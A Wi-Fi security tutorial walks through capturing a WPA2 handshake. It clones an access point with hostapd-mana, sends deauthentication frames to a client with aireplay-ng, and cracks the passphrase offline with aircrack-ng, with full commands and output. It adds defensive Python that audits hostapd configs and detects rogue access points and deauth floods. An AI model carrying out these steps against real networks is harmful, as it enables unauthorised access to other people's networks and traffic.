Introduction
A WPA (Wi-Fi Protected Access) handshake is the exchange in which a client device authenticates to an access point that uses the WPA security protocol. During this exchange the client and the access point trade the information needed to establish a secure connection, including the cryptographic material used to encrypt the traffic between them, thus ensuring the privacy and security of the Wi-Fi connection. In security testing, a captured WPA handshake can be used for brute-force (dictionary) attacks that recover the Wi-Fi network password: with WPA-PSK the session keys are derived from the pre-shared passphrase, so candidate passphrases can be checked offline against the captured exchange.
One way to obtain that handshake is to create an access point with the same identifying data as the original and get the client to connect to it: either the client is deliberately disconnected from the original access point, or, whenever it drops its connection for any reason, it reconnects automatically and ends up on the clone.
Retrieving the access point data
First we need the access point's data, obtained here with airodump-ng on a wireless interface placed in monitor mode.
$ sudo ip link set wlan1 down && sudo iw dev wlan1 set type monitor && sudo ip link set wlan1 up
$ sudo airodump-ng wlan1
CH 1 ][ Elapsed: 18 s ]
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
BA:53:9C:05:87:29 -10 93 205 0 0 1 65 WPA2 CCMP PSK WIFINET
We found a Wi-Fi network with ESSID WIFINET on channel 1, BSSID BA:53:9C:05:87:29, and WPA2-CCMP encryption with PSK (pre-shared key) authentication. The station section of the same output shows a connected client with MAC address 52:D6:59:D2:37:06:
BSSID STATION PWR Rate Lost Frames Notes Probes
BA:53:9C:05:87:29 52:D6:59:D2:37:06 -43 1e- 1e 44 174 WIFINET
Cloned access point configuration
We will use hostapd-mana, which both creates the access point and captures the handshake, so no second interface in monitor mode is needed for the capture itself. The tool is available in the default Kali Linux repositories and can be installed with apt.
$ sudo apt install hostapd-mana -y
The configuration file will be called hostapd-wpa2mana.conf (the name hostapd-mana reports in its output below) and uses the network interface wlan1. The captured handshake will be written to /tmp/handshake.hccapx.
$ vi hostapd-wpa2mana.conf
# Wireless interface
interface=wlan1
# Network name (ESSID) of the cloned network
ssid=WIFINET
# Channel of the cloned network
channel=1
# Use the 2.4 GHz band
hw_mode=g
# Enable IEEE 802.11n
ieee80211n=1
# Enable WPA2
wpa=2
# Enable pre-shared key authentication (WPA-PSK)
wpa_key_mgmt=WPA-PSK
# Use the CCMP cipher for WPA2
rsn_pairwise=CCMP
# WPA-PSK passphrase (its value does not matter for capturing the handshake)
wpa_passphrase=password
# File where the captured handshake will be saved
mana_wpaout=/tmp/handshake.hccapx
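Two settings in that file are what make the capture work: the WPA-PSK key management (the 4-way handshake can be attacked offline) and the absence of protected management frames (the deauthentication step below relies on the client honouring forged frames). As an added example, not part of the original write-up, the following Python script parses hostapd-style configuration files and flags those settings. Both configurations in it are constructed: the first is the cloned-AP file above without the hostapd-mana-specific mana_wpaout line, the second is the same network hardened with WPA3-SAE and mandatory 802.11w (ieee80211w=2). The 16-character passphrase threshold is an assumed local policy, not a hostapd limit.

```python
"""Audit a hostapd-style configuration for the settings that make the
handshake capture on this page possible: a WPA-PSK AKM (the captured
4-way handshake can be attacked offline) and management frames left
unprotected (a forged deauthentication is accepted by the station).
Added example; the configs and the passphrase policy are constructed.
"""

# Constructed: the cloned-AP configuration from the page, minus the
# hostapd-mana specific mana_wpaout line.
WEAK_CONF = """\
interface=wlan1
ssid=WIFINET
channel=1
hw_mode=g
ieee80211n=1
wpa=2
wpa_key_mgmt=WPA-PSK
rsn_pairwise=CCMP
wpa_passphrase=password
"""

# Constructed: the same network hardened with WPA3-SAE (no offline
# dictionary attack on the exchange) and mandatory 802.11w PMF
# (unprotected deauth frames are discarded by the station).
HARDENED_CONF = """\
interface=wlan1
ssid=WIFINET
channel=1
hw_mode=g
ieee80211n=1
wpa=2
wpa_key_mgmt=SAE
rsn_pairwise=CCMP
ieee80211w=2
sae_require_mfp=1
sae_password=REPLACE-WITH-A-LONG-RANDOM-PASSPHRASE
"""

MIN_PASSPHRASE_LEN = 16  # assumed local policy, not a hostapd limit


def parse_hostapd_conf(text):
    """Parse key=value lines; '#' comments and blank lines are skipped.
    A repeated key keeps its last value, which is how hostapd reads it."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        key, sep, value = line.partition("=")
        if sep:
            conf[key.strip()] = value.strip()
    return conf


def audit_hostapd_conf(text):
    """Return a list of (code, message) findings; an empty list means nothing flagged."""
    conf = parse_hostapd_conf(text)
    findings = []

    # wpa is a bit field: 1 = WPA (TKIP era), 2 = WPA2/RSN, 3 = both.
    if int(conf.get("wpa", "0")) & 1:
        findings.append(("legacy-wpa", "WPA1 is enabled alongside WPA2"))

    ciphers = (conf.get("wpa_pairwise", "") + " " + conf.get("rsn_pairwise", "")).split()
    if "TKIP" in ciphers:
        findings.append(("tkip", "TKIP pairwise cipher is allowed"))

    # hostapd defaults wpa_key_mgmt to WPA-PSK when the key is absent.
    akms = conf.get("wpa_key_mgmt", "WPA-PSK").split()
    if any(a in ("WPA-PSK", "WPA-PSK-SHA256") for a in akms):
        findings.append(("psk-akm", "WPA-PSK: a captured 4-way handshake can be brute-forced offline; prefer SAE"))

    # ieee80211w: 0 disabled (hostapd default), 1 optional, 2 required.
    if conf.get("ieee80211w", "0") != "2":
        findings.append(("no-pmf", "protected management frames not required; spoofed deauth frames will be honoured"))

    passphrase = conf.get("wpa_passphrase")
    if passphrase is not None and len(passphrase) < MIN_PASSPHRASE_LEN:
        findings.append(("short-passphrase", f"wpa_passphrase shorter than {MIN_PASSPHRASE_LEN} characters"))

    return findings


if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit_hostapd_conf(conf) or "no findings")
```

Run against the weak file it reports psk-akm, no-pmf and short-passphrase; the hardened file produces no findings. Note that mandatory PMF only helps when every client supports 802.11w; ieee80211w=1 (optional) keeps older clients working but leaves them deauthable.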
Activating the access point
The access point is started with hostapd-mana, passing the configuration file as its parameter.
$ sudo hostapd-mana hostapd-wpa2mana.conf
Configuration file: hostapd-wpa2mana.conf
MANA: Captured WPA/2 handshakes will be written to file '/tmp/handshake.hccapx'.
Using interface wlan1 with hwaddr c0:22:50:e6:1a:38 and ssid "WIFINET"
wlan1: interface state UNINITIALIZED->ENABLED
wlan1: AP-ENABLED
Deauthenticating the client from the original access point
Next, with aireplay-ng we send deauthentication frames to the client connected to the original access point so that it reconnects to the cloned one. Since wlan1 is in use by hostapd-mana, aireplay-ng injects from a second interface, wlan0, which must also be in monitor mode.
$ sudo aireplay-ng -0 0 -a BA:53:9C:05:87:29 -c 52:D6:59:D2:37:06 wlan0
Sending 64 directed DeAuth (code 7). STMAC: [52:D6:59:D2:37:06] [28|65 ACKs]
Sending 64 directed DeAuth (code 7). STMAC: [52:D6:59:D2:37:06] [64|63 ACKs]
Sending 64 directed DeAuth (code 7). STMAC: [52:D6:59:D2:37:06] [64|58 ACKs]
The ACK counts confirm that the client received the deauthentication frames.
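The frames exchanged in this step are exactly what a wireless IDS watches for. As an added example that is not part of the original post, here is a small Python detector run over a constructed management-frame log: it flags the cloned access point because a BSSID outside the inventory (c0:22:50:e6:1a:38, the hwaddr hostapd-mana reported above) beacons the WIFINET ESSID, and it flags the deauthentication flood as a burst of directed deauth frames to one station. The log format, the inventory and the threshold of 10 frames within 5 seconds are assumptions of the example.

```python
"""Flag the two stages of the attack on this page from a management-frame
log: a beacon advertising a known ESSID from a BSSID that is not in the
inventory (cloned AP), and a burst of deauthentication frames aimed at one
station. Added example over a constructed log; format and thresholds are
assumptions.
"""
from collections import defaultdict, deque

# Inventory of legitimate BSSIDs per ESSID (maintained by the defender;
# the WIFINET entry is the real access point from the airodump-ng output).
KNOWN_APS = {"WIFINET": {"ba:53:9c:05:87:29"}}

# Assumed alerting policy: this many deauth frames from one sender to one
# station inside the window is a flood, not a normal disconnect.
DEAUTH_THRESHOLD = 10
DEAUTH_WINDOW_S = 5.0

# Constructed log, one frame per line: time subtype src dst bssid key=value
SAMPLE_LOG = (
    "90.000 deauth ba:53:9c:05:87:29 aa:bb:cc:dd:ee:01 ba:53:9c:05:87:29 reason=3\n"
    "100.000 beacon ba:53:9c:05:87:29 ff:ff:ff:ff:ff:ff ba:53:9c:05:87:29 ssid=WIFINET\n"
    "100.102 beacon ba:53:9c:05:87:29 ff:ff:ff:ff:ff:ff ba:53:9c:05:87:29 ssid=WIFINET\n"
    "118.410 beacon c0:22:50:e6:1a:38 ff:ff:ff:ff:ff:ff c0:22:50:e6:1a:38 ssid=WIFINET\n"
    "118.512 beacon c0:22:50:e6:1a:38 ff:ff:ff:ff:ff:ff c0:22:50:e6:1a:38 ssid=WIFINET\n"
    "119.000 beacon 11:22:33:44:55:66 ff:ff:ff:ff:ff:ff 11:22:33:44:55:66 ssid=OTHERNET\n"
    # twelve directed deauths 50 ms apart, the pattern aireplay-ng produces
    + "".join(
        f"{120.0 + i * 0.05:.3f} deauth ba:53:9c:05:87:29 52:d6:59:d2:37:06 "
        "ba:53:9c:05:87:29 reason=7\n"
        for i in range(12)
    )
)


def parse_frame_line(line):
    """Parse one log line into a dict; trailing key=value fields are optional."""
    parts = line.split()
    frame = {"time": float(parts[0]), "subtype": parts[1], "src": parts[2].lower(),
             "dst": parts[3].lower(), "bssid": parts[4].lower()}
    for extra in parts[5:]:
        key, _, value = extra.partition("=")
        frame[key] = value
    return frame


def load_frames(text):
    """Parse all non-empty lines and sort them by timestamp."""
    frames = [parse_frame_line(l) for l in text.splitlines() if l.strip()]
    frames.sort(key=lambda f: f["time"])
    return frames


def detect_rogue_aps(frames, known=KNOWN_APS):
    """Return {essid: sorted unknown BSSIDs} for beacons of a known ESSID
    sent from a BSSID that is not in the inventory."""
    rogue = defaultdict(set)
    for f in frames:
        ssid = f.get("ssid")
        if f["subtype"] == "beacon" and ssid in known and f["bssid"] not in known[ssid]:
            rogue[ssid].add(f["bssid"])
    return {ssid: sorted(b) for ssid, b in rogue.items()}


def detect_deauth_bursts(frames, threshold=DEAUTH_THRESHOLD, window=DEAUTH_WINDOW_S):
    """Sliding-window count per (src, dst); returns [(src, dst, time of first alert)]."""
    recent = defaultdict(deque)
    alerts = {}
    for f in frames:  # frames are sorted by time
        if f["subtype"] != "deauth":
            continue
        key = (f["src"], f["dst"])
        q = recent[key]
        q.append(f["time"])
        while f["time"] - q[0] > window:  # drop timestamps older than the window
            q.popleft()
        if len(q) >= threshold and key not in alerts:
            alerts[key] = f["time"]
    return [(src, dst, t) for (src, dst), t in alerts.items()]


if __name__ == "__main__":
    frames = load_frames(SAMPLE_LOG)
    print("rogue APs:", detect_rogue_aps(frames))
    print("deauth bursts:", detect_deauth_bursts(frames))
```

The single deauth at 90.000 is a normal disconnect and does not alert; the twelve frames to 52:d6:59:d2:37:06 trip the threshold at the tenth frame. Detection is the fallback control here: with 802.11w protected management frames required on the real access point, clients discard the forged deauthentication frames in the first place.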
Retrieving the handshake and recovering the password
After a few seconds, hostapd-mana reports that it captured the client's handshake, followed by a possible PSK mismatch; the mismatch is expected, since the cloned access point does not know the original password.
$ sudo hostapd-mana hostapd-wpa2mana.conf
...
wlan1: STA 52:d6:59:d2:37:06 IEEE 802.11: associated
MANA: Captured a WPA/2 handshake from: 52:d6:59:d2:37:06
wlan1: AP-STA-POSSIBLE-PSK-MISMATCH 52:d6:59:d2:37:06
With the handshake file we can recover the password of the original access point using aircrack-ng and the john.lst dictionary. The MAC address of the access point is given with the --bssid parameter.
$ aircrack-ng -w /usr/share/wordlists/john.lst --bssid BA:53:9C:05:87:29 /tmp/handshake.hccapx
Aircrack-ng 1.7
[00:00:00] 535/3559 keys tested (12783.27 k/s)
Time left: 0 seconds 15.03%
KEY FOUND! [ margaret ]
Master Key : A9 35 99 1F 49 34 73 10 61 B2 97 10 A7 61 12 D6
8E B4 B0 2F 4C CB 00 A5 3F 8B F7 25 01 8C 63 24
Transient Key : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
EAPOL HMAC : FC 97 CD A4 15 3B 32 60 A3 D8 36 48 CA 79 49 1F
The key to the access point is margaret.
Conclusion
With the key obtained, we can connect to the network with wpa_supplicant and dhclient. If the password is strong enough, the default dictionaries will not recover it; we would have to build our own dictionaries or use other kinds of attacks, such as the "Evil Twin Attack", in which a cloned access point asks the client for the credentials through a captive web portal.